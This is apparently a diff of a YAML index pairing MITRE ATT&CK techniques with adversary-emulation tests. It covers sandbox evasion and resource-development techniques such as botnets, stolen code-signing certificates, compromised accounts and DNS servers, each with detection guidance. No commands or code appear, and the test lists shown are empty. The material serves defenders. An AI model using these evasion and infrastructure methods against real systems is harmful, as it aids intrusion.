Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.1' + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: false identifier: T1007 atomic_tests: - name: System Service Discovery @@ -42942,14 +47718,15 @@ discovery: name: powershell T1497.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1497.003 - url: https://attack.mitre.org/techniques/T1497/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Time Based Evasion + created: '2020-03-06T21:11:11.225Z' + modified: '2020-07-01T16:32:02.532Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 description: "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically @@ -42960,22 +47737,23 @@ discovery: Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. " - id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-07-01T16:32:02.532Z' - created: '2020-03-06T21:11:11.225Z' - x_mitre_defense_bypassed: - - Host forensic analysis - - Signature-based detection - - Static File Analysis - - Anti-virus - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true + name: Time Based Evasion + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1497.003 + url: https://attack.mitre.org/techniques/T1497/003 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_contributors: + - Deloitte Threat Library Team + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters x_mitre_detection: 'Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain @@ -42985,15 +47763,13 @@ discovery: implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ' - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Deloitte Threat Library Team - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Host forensic analysis + - Signature-based detection + - Static File Analysis + - Anti-virus atomic_tests: [] T1497.002: technique: @@ -43072,19 +47848,15 @@ discovery: atomic_tests: [] T1497: technique: - external_references: - - source_name: mitre-attack - external_id: T1497 - url: https://attack.mitre.org/techniques/T1497 - - source_name: Unit 42 Pirpi July 2015 - url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/ - description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations - on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April - 23, 2019.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Virtualization/Sandbox Evasion + created: '2019-04-17T22:22:24.505Z' + modified: '2020-07-01T16:32:02.272Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d description: "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine @@ -43101,16 +47873,35 @@ discovery: if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n" - id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-07-01T16:32:02.272Z' - created: '2019-04-17T22:22:24.505Z' - x_mitre_version: '1.2' + name: Virtualization/Sandbox Evasion + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1497 + url: https://attack.mitre.org/techniques/T1497 + - source_name: Unit 42 Pirpi July 2015 + url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/ + description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations + on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April + 23, 2019.' + x_mitre_is_subtechnique: false + x_mitre_defense_bypassed: + - Anti-virus + - Host forensic analysis + - Signature-based detection + - Static File Analysis + x_mitre_contributors: + - Deloitte Threat Library Team + - Sunny Neo + x_mitre_platforms: + - Windows + - macOS + - Linux + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters x_mitre_detection: Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should @@ -43121,22 +47912,3027 @@ discovery: required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_contributors: - - Deloitte Threat Library Team - - Sunny Neo - x_mitre_defense_bypassed: - - Anti-virus - - Host forensic analysis - - Signature-based detection - - Static File Analysis + x_mitre_version: '1.2' + atomic_tests: [] +resource-development: + T1583: + technique: + external_references: + - source_name: mitre-attack + external_id: T1583 + url: https://attack.mitre.org/techniques/T1583 + - source_name: TrendmicroHideoutsLease + description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: + Bulletproof Hosting Services. Retrieved March 6, 2017.' + url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Acquire Infrastructure + description: |- + Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. + + Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down. + id: attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T17:59:17.606Z' + created: '2020-09-30T16:37:40.271Z' + x_mitre_version: '1.0' x_mitre_is_subtechnique: false + x_mitre_detection: |- + Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. + x_mitre_platforms: + - PRE + atomic_tests: [] + T1583.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1583.005 + url: https://attack.mitre.org/techniques/T1583/005 + - source_name: Norton Botnet + url: https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html + description: Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020. + - source_name: Imperva DDoS for Hire + url: https://www.imperva.com/learn/ddos/booters-stressers-ddosers/ + description: Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October + 4, 2020. + - source_name: Krebs-Anna + description: Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai + Worm Author?. Retrieved May 15, 2017. + url: https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/ + - source_name: Krebs-Bazaar + description: Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service + Bazaar. Retrieved May 15, 2017. + url: https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/ + - source_name: Krebs-Booter + description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services + Numbered?. Retrieved May 15, 2017. + url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/ + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Botnet + description: 'Before compromising a victim, adversaries may buy, lease, or rent + a network of compromised systems that can be used during targeting. A botnet + is a network of compromised systems that can be instructed to perform coordinated + tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to + use an existing botnet from a booter/stresser service. With a botnet at their + disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) + or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: + Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)' + id: attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-05T02:15:01.325Z' + created: '2020-10-01T00:49:05.467Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint + Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network + Denial of Service](https://attack.mitre.org/techniques/T1498). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1584.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1584.005 + url: https://attack.mitre.org/techniques/T1584/005 + - source_name: Norton Botnet + url: https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html + description: Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020. + - source_name: Imperva DDoS for Hire + url: https://www.imperva.com/learn/ddos/booters-stressers-ddosers/ + description: Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October + 4, 2020. + - source_name: Dell Dridex Oct 2015 + url: https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation + description: Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, + October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May + 31, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Botnet + description: 'Before compromising a victim, adversaries may compromise numerous + third-party systems to form a botnet that can be used during targeting. A + botnet is a network of compromised systems that can be instructed to perform + coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting + a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), + adversaries may build their own botnet by compromising numerous third-party + systems. Adversaries may also conduct a takeover of an existing botnet, such + as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex + Oct 2015) With a botnet at their disposal, adversaries may perform follow-on + activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) + or Distributed Denial of Service (DDoS).' + id: attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:03:23.751Z' + created: '2020-10-01T00:58:35.269Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint + Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network + Denial of Service](https://attack.mitre.org/techniques/T1498). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1587.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1587.002 + url: https://attack.mitre.org/techniques/T1587/002 + - url: https://en.wikipedia.org/wiki/Code_signing + description: Wikipedia. (2015, November 10). Code Signing. Retrieved March + 31, 2016. + source_name: Wikipedia Code Signing + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Code Signing Certificates + description: |- + Before compromising a victim, adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. + + Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations. + id: attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-15T01:15:54.945Z' + created: '2020-10-01T01:41:08.652Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) + or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1588.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1588.003 + url: https://attack.mitre.org/techniques/T1588/003 + - url: https://en.wikipedia.org/wiki/Code_signing + description: Wikipedia. (2015, November 10). Code Signing. Retrieved March + 31, 2016. + source_name: Wikipedia Code Signing + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Code Signing Certificates + description: |- + Before compromising a victim, adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. + + Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party. + id: attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:22:21.007Z' + created: '2020-10-01T02:11:47.237Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) + or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1586: + technique: + id: attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a + description: "Before compromising a victim, adversaries may compromise accounts + with services that can be used during targeting. For operations incorporating + social engineering, the utilization of an online persona may be important. + Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), + adversaries may compromise existing accounts. Utilizing an existing persona + may engender a level of trust in a potential victim if they have a relationship, + or knowledge of, the compromised persona. \n\nA variety of methods exist for + compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), + purchasing credentials from third-party sites, or by brute forcing credentials + (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior + to compromising accounts, adversaries may conduct Reconnaissance to inform + decisions about which accounts to compromise to further their operation.\n\nPersonas + may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, + Twitter, Google, etc.). Compromised accounts may require additional development, + this could include filling out or modifying profile information, further developing + social networks, or incorporating photos.\n\nAdversaries may directly leverage + compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) + or [Phishing](https://attack.mitre.org/techniques/T1566)." + name: Compromise Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1586 + url: https://attack.mitre.org/techniques/T1586 + - source_name: AnonHBGary + description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside + story of the HBGary hack. Retrieved March 9, 2017.' + url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/ + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:05:46.296Z' + created: '2020-10-01T01:17:15.965Z' + x_mitre_data_sources: + - Social media monitoring + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_detection: |- + Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. + + Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). + atomic_tests: [] + T1584: + technique: + external_references: + - source_name: mitre-attack + external_id: T1584 + url: https://attack.mitre.org/techniques/T1584 + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + - source_name: ICANNDomainNameHijacking + description: 'ICANN Security and Stability Advisory Committee. (2005, July + 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved + March 6, 2017.' + url: https://www.icann.org/groups/ssac/documents/sac-007-en + - source_name: Talos DNSpionage Nov 2018 + url: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html + description: Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign + Targets Middle East. Retrieved October 9, 2020. + - source_name: FireEye EPS Awakens Part 2 + description: Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved + January 22, 2016. + url: https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html + - source_name: NSA NCSC Turla OilRig + url: https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf + description: 'NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla + Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October + 16, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Compromise Infrastructure + description: |- + Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. + + Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) + id: attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:03:23.937Z' + created: '2020-10-01T00:36:30.759Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection difficult for defenders. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_platforms: + - PRE + atomic_tests: [] + T1583.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1583.002 + url: https://attack.mitre.org/techniques/T1583/002 + - source_name: Unit42 DNS Mar 2019 + url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/ + description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can + be (ab)used by malicious actors. Retrieved October 3, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: DNS Server + description: |- + Before compromising a victim, adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. + + By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019) + id: attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-19T00:11:26.376Z' + created: '2020-10-01T00:40:45.279Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1584.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1584.002 + url: https://attack.mitre.org/techniques/T1584/002 + - source_name: Talos DNSpionage Nov 2018 + url: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html + description: Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign + Targets Middle East. Retrieved October 9, 2020. + - source_name: FireEye DNS Hijack 2019 + url: https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html + description: 'Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS + Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October + 9, 2020.' + - source_name: CiscoAngler + description: 'Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking + in the Domain Shadows. Retrieved March 6, 2017.' + url: https://blogs.cisco.com/security/talos/angler-domain-shadowing + - source_name: Proofpoint Domain Shadowing + url: https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows + description: 'Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising + campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, + 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + description: |- + Before compromising a victim, adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. + + By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) + name: DNS Server + id: attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-19T01:22:53.922Z' + created: '2020-10-01T00:54:30.869Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1587: + technique: + external_references: + - source_name: mitre-attack + external_id: T1587 + url: https://attack.mitre.org/techniques/T1587 + - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf + description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage + Units. Retrieved July 18, 2016. + source_name: Mandiant APT1 + - source_name: Kaspersky Sofacy + description: Kaspersky Lab's Global Research and Analysis Team. (2015, December + 4). Sofacy APT hits high profile targets with updated toolset. Retrieved + December 10, 2015. + url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ + - source_name: Bitdefender StrongPity June 2020 + url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf + description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing + Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020. + - source_name: Talos Promethium June 2020 + url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html + description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global + reach with StrongPity3 APT. Retrieved July 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Develop Capabilities + description: |- + Before compromising a victim, adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020) + + As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability. + id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:18:08.552Z' + created: '2020-10-01T01:30:00.877Z' + x_mitre_detection: Much of this activity will take place outside the visibility + of the target organization, making detection of this behavior difficult. Detection + efforts may be focused on related stages of the adversary lifecycle, such + as during Defense Evasion or Command and Control. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1587.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1587.003 + url: https://attack.mitre.org/techniques/T1587/003 + - source_name: Splunk Kovar Certificates 2017 + url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html + description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL + Certificates. Retrieved October 16, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Digital Certificates + description: |- + Before compromising a victim, adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). + + Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). + id: attack-pattern--1cec9319-743b-4840-bb65-431547bce82a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + modified: '2020-10-22T18:18:08.422Z' + created: '2020-10-01T01:42:24.974Z' + x_mitre_data_sources: + - SSL/TLS certificates + x_mitre_detection: |- + Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) + + Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install 